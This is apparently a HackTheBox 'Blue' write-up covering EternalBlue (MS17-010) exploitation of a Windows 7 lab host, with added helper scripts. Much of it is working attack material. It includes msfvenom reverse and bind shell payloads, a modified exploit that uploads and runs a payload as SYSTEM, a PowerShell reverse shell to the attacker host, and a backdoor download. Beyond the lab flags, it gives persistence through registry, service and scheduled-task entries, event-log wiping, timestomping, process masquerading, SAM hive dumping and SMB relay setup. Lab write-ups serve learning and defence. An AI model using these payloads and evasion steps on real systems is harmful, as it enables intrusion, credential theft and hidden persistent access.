
HackTheBox Blue

Writeup for HackTheBox Blue


Machine Synopsis

Key Exploitation Techniques:

  • SMB vulnerability scanning (MS17-010 / EternalBlue)
  • Remote code execution via an SMBv1 bug covered by MS17-010 (nmap reports CVE-2017-0143; EternalBlue itself is CVE-2017-0144)
  • Direct SYSTEM shell acquisition through kernel exploitation
  • Windows post-exploitation techniques

Reconnaissance & Enumeration

Port Discovery

$ nmap -sC -sV -A 10.10.10.40
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

SMB Vulnerability Assessment

# SMB vulnerability scanning
$ nmap --script=vuln 10.10.10.40
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|       servers (ms17-010).

Critical Finding: Target is vulnerable to MS17-010 (EternalBlue). The script reaches that verdict without touching anything: over an SMBv1 session it sends a PeekNamedPipe transaction on FID 0 and treats a STATUS_INSUFF_SERVER_RESOURCES (0xC0000205) reply as the unpatched signature, the same read-only check Metasploit's auxiliary/scanner/smb/smb_ms17_010 uses, so a positive here is reliable and cheap to confirm.
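The --script=vuln run above throws every vulnerability script at one host. Across a subnet the targeted form (-p445 --script smb-vuln-ms17-010, with --script-args vulns.showall so that patched hosts are reported too) is quieter and faster, and its output then needs triage. The block below is an added example written for this edit, not code from the original post: it pulls out the hosts whose smb-vuln-ms17-010 section reports State: VULNERABLE from nmap's normal (-oN) output. The scan text in sample_scan() is constructed for the example (one vulnerable host, one patched host), not a real scan, and the function names are this example's own.

```shell
#!/usr/bin/env bash
# Added example, not from the original post: triage an MS17-010 subnet scan.
#   nmap -p445 --script smb-vuln-ms17-010 --script-args vulns.showall 10.10.10.0/24 -oN ms17.txt
#   ms17_010_hosts < ms17.txt
set -u

# ms17_010_hosts: reads nmap normal output on stdin, prints one vulnerable host per line.
# Tracks the current "Nmap scan report for" host, enters the smb-vuln-ms17-010 block,
# and emits the host when that block's State line says VULNERABLE (not NOT VULNERABLE).
ms17_010_hosts() {
    awk '
        /^Nmap scan report for/   { host = $NF; gsub(/[()]/, "", host); insec = 0 }
        /^[|] smb-vuln-ms17-010:/ { insec = 1; next }        # entering the script block
        insec && /^[|] [^ ]/      { insec = 0 }              # a different script block starts
        insec && /State: VULNERABLE/ && !/NOT VULNERABLE/ { print host; insec = 0 }
    '
}

# Constructed sample (not a real scan): one vulnerable host and one patched host,
# in the layout nmap prints when vulns.showall is set.
sample_scan() {
    cat <<'EOF'
Nmap scan report for haris-pc (10.10.10.40)
Host is up (0.020s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|_      servers (ms17-010).

Nmap scan report for 10.10.10.41
Host is up (0.021s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms17-010:
|   NOT VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: NOT VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|_    Risk factor: HIGH
EOF
}

# Stand-alone use: ./ms17_hosts.sh ms17.txt   (no argument: run on the constructed sample)
if [ $# -ge 1 ]; then
    ms17_010_hosts < "$1"
else
    sample_scan | ms17_010_hosts
fi
```

Feed the function -oN output (not -oG or XML); for XML output use an XPath tool instead, since the block layout differs.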

SMB Enumeration

# Basic SMB enumeration
$ enum4linux -a 10.10.10.40
guest account is enabled.

# SMB version detection
$ smbclient -L 10.10.10.40
Anonymous login successful

Exploitation

EternalBlue Exploit Selection

# Search for MS17-010 exploits
$ searchsploit --id ms17-010
Microsoft Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)    | 42031
Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Exe | 42315

Exploit Preparation

# Copy the exploit script (42315.py) out of the local exploit-db mirror
$ searchsploit -m 42315

# 42315.py imports mysmb.py, which exploit-db ships under the same ID in its
# bin-sploits repository; save it under the name the script expects
$ wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42315.py -O mysmb.py

# Both files are Python 2 and need impacket importable from that interpreter

Payload Creation

# Create Windows reverse shell payload
$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.8 LPORT=1234 -f exe -o exploit.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Saved as: exploit.exe
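The msfvenom run above accepted the default x86 payload, while systeminfo later on this page reports an x64 host; the 32-bit exe still runs under WOW64 (which is why the shell works), but a mismatch the other way, an x64 payload dropped on a 32-bit host, fails silently at service start. The block below is an added example written for this edit, not code from the original post: it reads the Machine field of a PE header with od and awk, classifies the payload as x86, x64 or arm64, and compares it with the intended target. The stub PE files it builds (make_stub_pe) are constructed test fixtures, not real binaries, and the file and function names are this example's own.

```shell
#!/usr/bin/env bash
# Added example, not from the original post: check a PE payload's architecture
# before dropping it. Layout used (PE/COFF): 'MZ' at offset 0, 4-byte e_lfanew at
# 0x3c pointing at 'PE\0\0', then IMAGE_FILE_HEADER whose first 2-byte field is
# Machine (0x014c = i386, 0x8664 = AMD64, 0xaa64 = ARM64).
set -u

# read_le <file> <offset> <nbytes>: unsigned little-endian integer, or nothing past EOF
read_le() {
    od -An -v -t u1 -j "$2" -N "$3" "$1" 2>/dev/null |
        awk '{ v = 0; for (i = NF; i >= 1; i--) v = v * 256 + $i; print v }'
}

# pe_arch <file>: prints x86 | x64 | arm64 | not-pe | unknown(<machine>); non-zero on failure
pe_arch() {
    local f=$1 magic lfanew sig machine
    magic=$(read_le "$f" 0 2)
    [ "${magic:-0}" -eq 23117 ] || { echo not-pe; return 1; }      # 'MZ' = 0x5a4d
    lfanew=$(read_le "$f" 60 4)
    sig=$(read_le "$f" "${lfanew:-0}" 4)
    [ "${sig:-0}" -eq 17744 ] || { echo not-pe; return 1; }        # 'PE\0\0' = 0x4550
    machine=$(read_le "$f" $(( ${lfanew:-0} + 4 )) 2)
    case ${machine:-0} in
        332)   echo x86 ;;     # 0x014c IMAGE_FILE_MACHINE_I386
        34404) echo x64 ;;     # 0x8664 IMAGE_FILE_MACHINE_AMD64
        43620) echo arm64 ;;   # 0xaa64 IMAGE_FILE_MACHINE_ARM64
        *)     echo "unknown(${machine:-0})"; return 1 ;;
    esac
}

# payload_fits <payload.exe> <target-arch>: 0 native match; 1 x86 payload on an x64 host
# (runs under WOW64 but leaves you in a 32-bit process); 2 will not run at all
payload_fits() {
    local p
    p=$(pe_arch "$1") || return 2
    if [ "$p" = "$2" ]; then return 0
    elif [ "$p" = x86 ] && [ "$2" = x64 ]; then return 1
    else return 2
    fi
}

# --- constructed fixtures (not real binaries): just enough header to be parsed ---
put_byte()   { printf "\\$(printf '%03o' "$1")"; }
put_u16_le() { put_byte $(( $1 & 255 )); put_byte $(( ($1 >> 8) & 255 )); }
put_u32_le() { put_u16_le $(( $1 & 65535 )); put_u16_le $(( ($1 >> 16) & 65535 )); }

# make_stub_pe <out> <machine-decimal>: DOS stub, e_lfanew=0x40, PE signature, Machine
make_stub_pe() {
    {
        put_byte 77; put_byte 90                           # 'MZ'
        printf '%58s' ''                                   # filler up to offset 0x3c
        put_u32_le 64                                      # e_lfanew = 0x40
        put_byte 80; put_byte 69; put_byte 0; put_byte 0   # 'PE\0\0' at 0x40
        put_u16_le "$2"                                    # IMAGE_FILE_HEADER.Machine
        printf '%18s' ''                                   # rest of the file header, unused
    } > "$1"
}

# Stand-alone use: ./pe_arch.sh exploit.exe backdoor.exe
if [ $# -ge 1 ]; then
    for f in "$@"; do printf '%s: %s\n' "$f" "$(pe_arch "$f")"; done
fi
```

Only the COFF header is read, so the check works on msfvenom output regardless of template or encoder; it does not tell you whether the payload is staged or stageless, which the handler still has to match.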

Exploit Modification

# Modify 42315.py exploit script
# Credentials for the SMB session: Blue's guest account is enabled (see enum4linux
# above), so a guest login works where an empty username might be refused
USERNAME = 'guest'
PASSWORD = ''

# smb_pwn() is called with a SMB connection that the exploit has already elevated to
# SYSTEM; replace the stock body (which only creates a marker file) with upload + execute
def smb_pwn(conn, arch):
    smbConn = conn.get_smbconnection()

    print('creating file c:\\exploit.exe on the target')
    # local path of the msfvenom payload -> C:\exploit.exe on the target via the C$ share
    smb_send_file(smbConn, '/home/user/HackTheBox/Blue/exploit.exe', 'C', '/exploit.exe')
    # service_exec() registers a temporary service whose binary path is this command,
    # so it runs as SYSTEM
    service_exec(conn, r'cmd /c c:\exploit.exe')

Exploitation Execution

# Setup netcat listener
$ nc -nlvp 1234
listening on [any] 1234 ...

# Execute EternalBlue exploit (Python 2). The ServiceExec timeout at the end is expected:
# the "service" is the reverse shell, which never reports back to the SCM, so the script
# gives up and removes the service entry while the shell is already on the listener
$ python 42315.py 10.10.10.40
Target OS: Windows 7 Professional 7601 Service Pack 1
Using named pipe: samr
...
Opening SVCManager on 10.10.10.40.....
Creating service cFsa.....
Starting service cFsa.....
The NETBIOS connection with the remote host timed out.
Removing service cFsa.....
ServiceExec Error on: 10.10.10.40
nca_s_proto_error
Done

SYSTEM Shell Access

# Reverse shell connection received
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.40] 49161
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>hostname
haris-PC

Flag Retrieval

C:\Windows\system32>cd "C:\Users\haris\Desktop"
C:\Users\haris\Desktop>type user.txt
4c546aea7dbee75cbd71de245c8deea9

C:\Users\haris\Desktop>cd "C:\Users\Administrator\Desktop"
C:\Users\Administrator\Desktop>type root.txt
ff548eb71e920ff6c08843ce9df4e717

Post-Exploitation Techniques

Persistence Methods

Registry Persistence

# Create backdoor payload
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.8 LPORT=4444 -f exe -o backdoor.exe

# Setup HTTP server for file transfer
$ python3 -m http.server 80
# Download backdoor on target
C:\Windows\system32>powershell -c "(New-Object Net.WebClient).DownloadFile('http://10.10.14.8/backdoor.exe','C:\Windows\System32\backdoor.exe')"

# Add registry auto-start entry. Caveat: this Run key fires at interactive logon and runs
# the binary as the user who logs on, not as SYSTEM; the service and the /ru SYSTEM
# scheduled task below are what give a SYSTEM-level restart
C:\Windows\system32>reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SecurityUpdate" /t REG_SZ /d "C:\Windows\System32\backdoor.exe"
The operation completed successfully.

# Verify persistence
C:\Windows\system32>reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SecurityUpdate"

Service Installation

# Create persistent Windows service. A plain msfvenom exe is not a service binary: the
# SCM waits about 30 s for it to register a control handler, then reports error 1053 and
# terminates the process. Build the payload with -f exe-service (or migrate immediately)
# if it has to survive that
C:\Windows\system32>sc create "WindowsUpdateService" binpath= "C:\Windows\System32\backdoor.exe" start= auto
[SC] CreateService SUCCESS

C:\Windows\system32>sc start "WindowsUpdateService"

C:\Windows\system32>sc query "WindowsUpdateService"

# Setup Metasploit handler for backdoor connections
$ msfconsole -q
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.10.14.8
msf6 exploit(multi/handler) > set LPORT 4444
msf6 exploit(multi/handler) > exploit

Scheduled Task

# Create system startup task
C:\Windows\system32>schtasks /create /tn "SecurityUpdate" /tr "C:\Windows\System32\backdoor.exe" /sc onstart /ru SYSTEM
SUCCESS: The scheduled task "SecurityUpdate" has successfully been created.

C:\Windows\system32>schtasks /query /tn "SecurityUpdate"

# Test task execution
C:\Windows\system32>schtasks /run /tn "SecurityUpdate"

Defense Evasion

Event Log Clearing

# Clear Windows Event Logs. Clearing is itself logged: the Security log records event 1102
# and the System log records event 104, a loud signal to any forwarder collecting them
C:\Windows\system32>for /f "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"

# Clear specific security logs
C:\Windows\system32>wevtutil cl Security
C:\Windows\system32>wevtutil cl System
C:\Windows\system32>wevtutil cl Application

File Attribute Manipulation

# Hide backdoor files (+h +s only hides the file from default dir and Explorer listings)
C:\Windows\system32>attrib +h +s C:\Windows\System32\backdoor.exe

# Timestomp files to match system files. This rewrites only the $STANDARD_INFORMATION
# timestamps; the $FILE_NAME timestamps in the MFT record keep the real drop time,
# so MFT-level forensics still spots the file
C:\Windows\system32>powershell "(Get-Item C:\Windows\System32\backdoor.exe).LastWriteTime = (Get-Item C:\Windows\System32\kernel32.dll).LastWriteTime"
C:\Windows\system32>powershell "(Get-Item C:\Windows\System32\backdoor.exe).CreationTime = (Get-Item C:\Windows\System32\kernel32.dll).CreationTime"

Process Hiding

# Run backdoor under a legitimate-looking name. Do not copy over C:\Windows\System32\svchost.exe
# itself: the real file is owned by TrustedInstaller (SYSTEM cannot overwrite it without taking
# ownership first) and breaking it breaks the box. Use a copy in a writable directory instead
C:\Windows\system32>copy backdoor.exe C:\Windows\Temp\svchost.exe
C:\Windows\system32>start C:\Windows\Temp\svchost.exe

Lateral Movement Preparation

Network Discovery

# Discover network hosts
C:\Windows\system32>for /L %i in (1,1,254) do @ping -n 1 -w 100 10.10.10.%i | findstr "Reply"

# ARP table enumeration
C:\Windows\system32>arp -a

# Browse list of hosts (the target sits in WORKGROUP, so /domain lists workgroups, not an AD domain)
C:\Windows\system32>net view /domain

Credential Harvesting

# Dump SAM database: the hives are locked while Windows runs, so export them with reg save as
# SYSTEM and parse them offline on the attacker host (e.g. impacket's secretsdump in LOCAL mode)
C:\Windows\system32>reg save HKLM\SAM C:\Windows\Temp\sam
C:\Windows\system32>reg save HKLM\SYSTEM C:\Windows\Temp\system
C:\Windows\system32>reg save HKLM\SECURITY C:\Windows\Temp\security

# Search for stored credentials
C:\Windows\system32>cmdkey /list

# Search for password files
C:\Windows\system32>dir /s /b C:\ | findstr /i password
C:\Windows\system32>dir /s /b C:\ | findstr /i credential

Privilege Verification

# Check current privileges
C:\Windows\system32>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                               State
============================= ========================================= ========
SeCreateTokenPrivilege       Create a token object                     Disabled
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeLockMemoryPrivilege         Lock pages in memory                      Enabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process       Disabled
...

# Check group memberships
C:\Windows\system32>whoami /groups

System Information Gathering

# System information
C:\Windows\system32>systeminfo
Host Name:                 HARIS-PC
OS Name:                   Microsoft Windows 7 Professional
OS Version:                6.1.7601 Service Pack 1 Build 7601
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                          [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
Total Physical Memory:     2,047 MB
Available Physical Memory: 1,509 MB

# Network configuration
C:\Windows\system32>ipconfig /all

# Running processes
C:\Windows\system32>tasklist /v

# Installed software (caveat: Win32_Product makes the MSI engine verify and repair every
# installed package; it is slow and writes reconfiguration events to the Application log)
C:\Windows\system32>wmic product get name,version

Alternative Exploitation Methods

AutoBlue EternalBlue Exploitation

# Alternative exploit framework (Python 2 + impacket)
$ git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git
$ cd AutoBlue-MS17-010
$ pip install impacket

# The exploit takes a raw shellcode file, not msfvenom's -f python source. The repo's
# shellcode/shell_prep.sh prompts for LHOST/LPORT, runs msfvenom with -f raw and prepends
# the kernel-mode stub, writing shellcode/sc_x64.bin; the target is x64 (see systeminfo
# above), so pick the windows/x64 payload when prompted
$ cd shellcode && ./shell_prep.sh && cd ..
$ python eternalblue_exploit7.py 10.10.10.40 shellcode/sc_x64.bin

Metasploit EternalBlue

# Using Metasploit framework
$ msfconsole -q
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.10.40
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.10.14.8
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 10.10.14.8:4444 
[*] 10.10.10.40:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.10.40:445       - Host is likely VULNERABLE to MS17-010!
[*] 10.10.10.40:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.10.40:445 - The target is vulnerable.
[*] Meterpreter session 1 opened (10.10.14.8:4444 -> 10.10.10.40:49158)

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

PowerShell Reverse Shell

# Create PowerShell reverse shell
$ cat > shell.ps1 << 'EOF'
$client = New-Object System.Net.Sockets.TCPClient('10.10.14.8',443);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
    $sendback = (iex $data 2>&1 | Out-String );
    $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
    $stream.Write($sendbyte,0,$sendbyte.Length);
    $stream.Flush();
};
$client.Close()
EOF

# Execute via EternalBlue: in smb_pwn() upload shell.ps1 with smb_send_file() the same way
# exploit.exe was uploaded, start a listener on 443, and change the service_exec() command to:
#   cmd /c powershell -ExecutionPolicy Bypass -File C:\shell.ps1

Alternative Payloads

Meterpreter Reverse TCP

# Generate meterpreter payload
$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.8 LPORT=443 -f exe -o meterpreter.exe

# Setup multi/handler
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.10.14.8
msf6 exploit(multi/handler) > set LPORT 443
msf6 exploit(multi/handler) > exploit

Bind Shell

# Generate bind shell payload (listens on the target, so Windows Firewall there must allow
# inbound 4444; this is why a reverse shell is the default choice)
$ msfvenom -p windows/shell_bind_tcp LPORT=4444 -f exe -o bind.exe

# Connect to bind shell once it has been dropped and started through the exploit
$ nc 10.10.10.40 4444

SMB Relay Attacks

# Setup SMB relay. Needs a second host whose users authenticate to the attacker: a captured
# NTLM exchange cannot simply be reflected back to the SMB service of the host it came from
# (MS08-068), and the relay target must not require SMB signing, which Windows 7
# workstations do not by default. On a single-box lab this is only preparation
$ python ntlmrelayx.py -t smb://10.10.10.40 -smb2support

# Poison name resolution to capture NetNTLM hashes. Turn Responder's own SMB and HTTP
# servers off in Responder.conf first, otherwise they collide with ntlmrelayx on 445/80
$ responder -I tun0 -w -d
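The Responder and ntlmrelayx pairing above only works if Responder gives up its own SMB and HTTP servers, since both tools bind 445 and 80; Responder reads those switches from the [Responder Core] section of Responder.conf. This added example, written for this edit and not part of the original post or of either tool, flips the two settings on a constructed excerpt of that config and verifies the result before the tools are started. sample_responder_conf() is a constructed fixture (a subset of the stock file's server switches), and the function names are this example's own.

```shell
#!/usr/bin/env bash
# Added example, not from the original post: hand the SMB/HTTP listeners from
# Responder to ntlmrelayx by editing Responder.conf, then confirm the change.
set -u

# Constructed excerpt of a stock Responder.conf, used as sample input.
sample_responder_conf() {
    cat <<'EOF'
[Responder Core]

; Servers to start
SQL = On
SMB = On
RDP = On
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = On
HTTPS = On
DNS = On
LDAP = On
EOF
}

# disable_relay_listeners <conf>: turn off the two servers ntlmrelayx has to own.
# Anchored on the full setting name so "HTTPS = On" is not touched by the HTTP rule.
disable_relay_listeners() {
    local conf=$1 tmp
    tmp=$(mktemp) || return 1
    sed -e 's/^SMB = On$/SMB = Off/' -e 's/^HTTP = On$/HTTP = Off/' "$conf" > "$tmp" &&
        mv "$tmp" "$conf"
}

# setting_value <conf> <name>: print the value of a "Name = Value" line (first match)
setting_value() {
    awk -v k="$2" -F' = ' '$1 == k { print $2; exit }' "$1"
}

# relay_ready <conf>: 0 when SMB and HTTP are both Off, 1 otherwise
relay_ready() {
    [ "$(setting_value "$1" SMB)" = Off ] && [ "$(setting_value "$1" HTTP)" = Off ]
}

# Stand-alone use: ./relay_prep.sh /usr/share/responder/Responder.conf
if [ $# -ge 1 ]; then
    disable_relay_listeners "$1"
    if relay_ready "$1"; then
        echo "$1: SMB and HTTP off, start ntlmrelayx before responder"
    else
        echo "$1: SMB/HTTP still on, check the file by hand" >&2
        exit 1
    fi
fi
```

Run it against the real Responder.conf (path depends on the install; Kali ships it under /usr/share/responder) before launching responder, and start ntlmrelayx first so it gets the ports.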

This post is licensed under CC BY 4.0 by the author.